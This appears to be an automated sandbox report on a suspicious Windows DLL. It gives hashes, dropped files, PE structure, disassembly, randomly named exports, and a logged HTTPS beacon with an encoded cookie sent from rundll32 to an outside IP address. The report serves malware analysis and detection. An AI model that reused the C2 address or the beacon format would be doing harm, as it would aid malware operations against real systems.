                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE884.tmp.txt
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13340
                                                                                                            Entropy (8bit):2.694315717418316
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:9GiZYW/LmqavzYnOYhWqHZYEZsvtCiEZCjqwfV8faueh+JXIsw3:9jZD/QoOJLGaueh+J4sw3
                                                                                                            MD5:0D5D9E8F0EA0D8556A705AC088B1691F
                                                                                                            SHA1:45426C44115F30140F0AF85952F2AF22AFB7B30A
                                                                                                            SHA-256:2DE70B0EBDA238AD81B22398D2FC4AB4BA4FBFBCFABCC3FCC006A23110C327E1
                                                                                                            SHA-512:FF40E9E20DA5A6914F418D80A1230BB8C87530AC36FA2677751E50C643AACA62B92A1CD62EE41BAC6BDF37F859AA5AE3E372CFFF1D347B9E6DD5C6E17D670C3C
                                                                                                            Malicious:false
                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):7250
                                                                                                            Entropy (8bit):3.16622869479047
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEb+Ab+:cY+38+DJc+iGr+MZ+65+6tg+ECg+r
                                                                                                            MD5:F32E205765A5EA75A7D4D781ACDBB3BC
                                                                                                            SHA1:1E1FD988750282F2D43E60C6234EB28EBBCE7913
                                                                                                            SHA-256:41F7D2CC292C077B4C108D1AA90C43D33273512442B8AAE1BE659AC4D9876B15
                                                                                                            SHA-512:4D350AAB533FCFBC1DE80557A65772AEA14234E660A24C2A03BC85B0570DCB7AD25BB937964E57F6D260259FB5A250DEA7ED20543B3FEA58292FE9EFAB30C1C7
                                                                                                            Malicious:false
                                                                                                            Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                            C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211202_173411_162.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):12288
                                                                                                            Entropy (8bit):3.8215928678402555
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:pC/SB2o+DK5Su92Z2YXmCCvI2l/Skq1P4zlT2VYFzgUMCM6JRol5PfbMCml5VbMJ:4/zAVOF2gzlnC/XChC0CYCRCP
                                                                                                            MD5:F56C797108F1B0EFC18279554D5F727A
                                                                                                            SHA1:EB91844C9E6B53833D7360602C1E98AABFA5763C
                                                                                                            SHA-256:97EAC58D628AAD2EAD17AC9BE3DC905F803A605283BD7178663C69AD75923D81
                                                                                                            SHA-512:3AA9BE47A75CC9627CB6CF40E84976890BA5F89DF01F7D3B6395AAC1C65D41DAFEC393DBBA8677A35E5F4D02DD3DC7744CEE785841417A2ED170C27EA1993134
                                                                                                            Malicious:false
                                                                                                            Preview: .... ... ....................................... ...!...............................0............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .......>............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.0.2._.1.7.3.4.1.1._.1.6.2...e.t.l.........P.P.....0...........................................................................................................................................................................................................................................................................
                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1572864
                                                                                                            Entropy (8bit):4.267634574274262
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:qkoswPRnkLvsEfv4lq5R4AdmVMSewOlmTQACI1bPdsd+bqLwSrD8Wu1R:xoswPRnkLvsEfv4En9CR
                                                                                                            MD5:ADD33C28B73DC52233D3FF5D95CA1612
                                                                                                            SHA1:BA83CA6BDC55A68281C5C06CBE878F6FA750CE8C
                                                                                                            SHA-256:A004D58EEAC43B48DAA62D17E345FB918FD27CF5EE0336B8BFB38BA4C3CA5342
                                                                                                            SHA-512:AD54436A5779336511D96480C92F86EC97CFBEDCAE690D1D11CA5A7B63472736143F39A79B92B126982F276D8DCF75B7978828E5F78B5D97F351CF813391DE39
                                                                                                            Malicious:false
                                                                                                            Preview: regfR...R...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmfo...................................................................................................................................................................................................................................................................................................................................................;..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):3.053139888950346
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:udXJb1ZymBsRFYv5FSE9lMqXyQVWnxuYW2odKqe8mxwp4uN5J:wZl5TXQnxuf2odPmxwp4uN5J
                                                                                                            MD5:77DEEDF0476D997DAF784E50870E7198
                                                                                                            SHA1:A3376EB61933CD8EF72FFD538C805C4B83FB0AC4
                                                                                                            SHA-256:706588ECDADB13CC58740EE6F11A7293EF7ECEA5E191529FF813E580CEBAC555
                                                                                                            SHA-512:D2937BF45BC24AE1A249B8D22C1275A5FC4BB70C9CAE1876F14A5937B91B06872684BD14B2CE78F34DF3A8148CCD319F9ABD39AE78317C6B2F4A25B9784F5EA8
                                                                                                            Malicious:false
                                                                                                            Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmfo...................................................................................................................................................................................................................................................................................................................................................;..HvLE.>......Q...........BiUo....J...6D..........................hbin................p.\..,..........nk,.do...................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .do.......... ...........P............... .......Z.......................Root........lf......Root....nk .do.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.067331172246508
                                                                                                            TrID:
                                                                                                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                            • DOS Executable Generic (2002/1) 0.20%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:3pO1282Kpx.dll
                                                                                                            File size:372736
                                                                                                            MD5:173345845a2a7d0d99c17bdc5445df90
                                                                                                            SHA1:35ed97b5ac5a3ed0fdc00eabff20f3bfcdfc8a7c
                                                                                                            SHA256:9ed58848f0a7b354a32d4ef67ea9ff70ba75f9238c39d9f1af88fae6811cb504
                                                                                                            SHA512:c67f4a25b4538ea45291636f4eb1c845bbe5ab68ae3297132f2e4bbde7f941a11eb276d5bdebe8179f412fd2e63a5346d53890c1e6aeacca88c7a84bde35bda4
                                                                                                            SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyt6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLQRQKqV4epRmxAvAD
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                                                                                                            File Icon

                                                                                                            Icon Hash:74f0e4ecccdce0e4

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x1001a401
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x10000000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                            Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                                                                                                            TLS Callbacks:0x1000c500
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:609402ef170a35cc0e660d7d95ac10ce

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            cmp dword ptr [ebp+0Ch], 01h
                                                                                                            jne 00007F1A84AFA1D7h
                                                                                                            call 00007F1A84AFA568h
                                                                                                            push dword ptr [ebp+10h]
                                                                                                            push dword ptr [ebp+0Ch]
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFA083h
                                                                                                            add esp, 0Ch
                                                                                                            pop ebp
                                                                                                            retn 000Ch
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFAA7Eh
                                                                                                            pop ecx
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            jmp 00007F1A84AFA1DFh
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFE564h
                                                                                                            pop ecx
                                                                                                            test eax, eax
                                                                                                            je 00007F1A84AFA1E1h
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFE5E0h
                                                                                                            pop ecx
                                                                                                            test eax, eax
                                                                                                            je 00007F1A84AFA1B8h
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                            je 00007F1A84AFAB43h
                                                                                                            jmp 00007F1A84AFAB20h
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push 00000000h
                                                                                                            call dword ptr [1002808Ch]
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call dword ptr [10028088h]
                                                                                                            push C0000409h
                                                                                                            call dword ptr [10028040h]
                                                                                                            push eax
                                                                                                            call dword ptr [10028090h]
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            sub esp, 00000324h
                                                                                                            push 00000017h
                                                                                                            call dword ptr [10028094h]
                                                                                                            test eax, eax
                                                                                                            je 00007F1A84AFA1D7h
                                                                                                            push 00000002h
                                                                                                            pop ecx
                                                                                                            int 29h
                                                                                                            mov dword ptr [1005AF18h], eax
                                                                                                            mov dword ptr [1005AF14h], ecx
                                                                                                            mov dword ptr [1005AF10h], edx
                                                                                                            mov dword ptr [1005AF0Ch], ebx
                                                                                                            mov dword ptr [1005AF08h], esi
                                                                                                            mov dword ptr [1005AF04h], edi
                                                                                                            mov word ptr [eax], es

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x280000x313fa0x31400False0.822468868972data7.43227371512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                                                                                                            USER32.dllGetDC, ReleaseDC, GetWindowRect

                                                                                                            Exports

                                                                                                            NameOrdinalAddress
                                                                                                            Control_RunDLL10x100010a0
                                                                                                            ajkaibu20x100016c0
                                                                                                            akyncbgollmj30x10001480
                                                                                                            alrcidxljxybdggs40x10001860
                                                                                                            bgmotrriehds50x10001820
                                                                                                            bojkfvynhhupnooyb60x100019f0
                                                                                                            bujuoqldqlzaod70x10001800
                                                                                                            bunsahctogxzts80x100019e0
                                                                                                            cjogbtafwukesw90x10001830
                                                                                                            csbbcaopuok100x100016a0
                                                                                                            cyqrjpaeorjur110x100015f0
                                                                                                            dlrzuyaeqj120x10001840
                                                                                                            egiimrq130x10001850
                                                                                                            evhgyts140x100014f0
                                                                                                            fdqpjjjyuw150x100017e0
                                                                                                            finabzjyxhxnnuuv160x10001510
                                                                                                            fkeacqpbbfw170x10001910
                                                                                                            fuwsgzf180x10001790
                                                                                                            fzbmpailk190x10001980
                                                                                                            gamsrhauvgl200x10001810
                                                                                                            gjfqgtgk210x10001a10
                                                                                                            gwsmfxfmekkyr220x100018b0
                                                                                                            haymuvtatadeydqmk230x10001530
                                                                                                            hqruohhkvpdalhq240x10001620
                                                                                                            htdaydfvtjlujwcaj250x10001660
                                                                                                            hzyrvjtx260x100017c0
                                                                                                            ifnsupqhxkwj270x10001870
                                                                                                            ijhgowlpmypocg280x10001720
                                                                                                            ispjhrqaxnyflnn290x100015a0
                                                                                                            iszvcqv300x100017a0
                                                                                                            ixgucop310x100018d0
                                                                                                            jcdvrhrguqtjpkc320x100016b0
                                                                                                            jkfyadsdpoks330x100019c0
                                                                                                            kfzgxmljkwaqy340x10001730
                                                                                                            kzfvroxozxufciczm350x10001740
                                                                                                            lpstjqa360x10001900
                                                                                                            ltkoyvzovzkqemyw370x10001630
                                                                                                            mdigcwjymnzvgaql380x100014d0
                                                                                                            mefathlzguuhqodfx390x10001950
                                                                                                            mgsrmfbja400x10001500
                                                                                                            mrxhcceopg410x100014a0
                                                                                                            nafhmuoq420x100018f0
                                                                                                            nefxgpc430x100018a0
                                                                                                            nrehxpiznrppeu440x10001690
                                                                                                            nucocnvjyqp450x100018e0
                                                                                                            obxoxtcbntaxofr460x10001890
                                                                                                            ofrzojd470x100016e0
                                                                                                            oofbctfc480x10001550
                                                                                                            opzpazspbecyjojf490x100015b0
                                                                                                            oqoigff500x10001a00
                                                                                                            oujlzhzvhjh510x100016f0
                                                                                                            ovpsanbypajv520x100015e0
                                                                                                            pblpcaadqbdxyb530x10001680
                                                                                                            ragwdgnyohftj540x100017d0
                                                                                                            rfosmac550x10001710
                                                                                                            rgymbuetvifqjqdlo560x10001930
                                                                                                            rmoxbxbbgidnbds570x10001970
                                                                                                            rxnkmfbycdcc580x10001560
                                                                                                            sefltbc590x10001880
                                                                                                            sgieprcsphl600x100019a0
                                                                                                            shpcmnqzvyltgdt610x100016d0
                                                                                                            slktbekupvmdbt620x100015c0
                                                                                                            sormivnk630x10001570
                                                                                                            tdblkstlyin640x10001600
                                                                                                            tkllyrc650x10001650
                                                                                                            tkwpnvfqnbpbdqe660x10001a20
                                                                                                            tnhtgnjrabqakgeke670x10001700
                                                                                                            tzpmcwwig680x10001520
                                                                                                            uceklmggjof690x10001610
                                                                                                            ukwdddyj700x10001640
                                                                                                            uwnaptydgur710x10001940
                                                                                                            vjusqoeo720x10001580
                                                                                                            vnyufpq730x10001590
                                                                                                            vsrwmkhzkrtlexxb740x100014e0
                                                                                                            wermsdfzb750x10001770
                                                                                                            wkhpfdjkypy760x100014c0
                                                                                                            wksndtayhfm770x100015d0
                                                                                                            wnjvxspilxpchq780x10001670
                                                                                                            wuqwfssiddrcl790x10001570
                                                                                                            wyyhtqptznbrknitg800x100017f0
                                                                                                            wzkcijdvadq810x10001540
                                                                                                            wzxlvxuyy820x100019b0
                                                                                                            xhtxeilfgsghxik830x10001780
                                                                                                            xvdijhconoukll840x100014b0
                                                                                                            ybbwnezvxfafm850x10001750
                                                                                                            yeylpreasnzamgac860x100019d0
                                                                                                            ypkidshxgzkkehc870x100018c0
                                                                                                            ypzvmpfbgai880x10001760
                                                                                                            zbrzizodycg890x10001990
                                                                                                            zdiuqcnzg900x10001920
                                                                                                            zfkwwtxd910x10001490
                                                                                                            zktykfwmaehxg920x10001600
                                                                                                            zmkbqvofdhermov930x10001960
                                                                                                            zvtqmkitgmzgo940x100017b0

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 2, 2021 09:37:00.963155031 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:00.963232994 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:00.963329077 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:01.001019955 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:01.001066923 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:01.338563919 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:01.338795900 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:02.504507065 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:02.504545927 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:02.504834890 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:02.504904032 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:02.532196045 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:02.572880983 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:03.082030058 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:03.082098007 CET4434980445.63.5.129192.168.2.5
                                                                                                            Dec 2, 2021 09:37:03.082125902 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:03.082154989 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:03.083518982 CET49804443192.168.2.545.63.5.129
                                                                                                            Dec 2, 2021 09:37:03.083554029 CET4434980445.63.5.129192.168.2.5

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • 45.63.5.129

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            0192.168.2.54980445.63.5.129443C:\Windows\SysWOW64\rundll32.exe
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            2021-12-02 08:37:02 UTC0OUTGET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1
                                                                                                            Cookie: gKjP=1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuwewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLpY2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hOoLZlL9MMnyWT3k4lhqZIOv4dj0Q=
                                                                                                            Host: 45.63.5.129
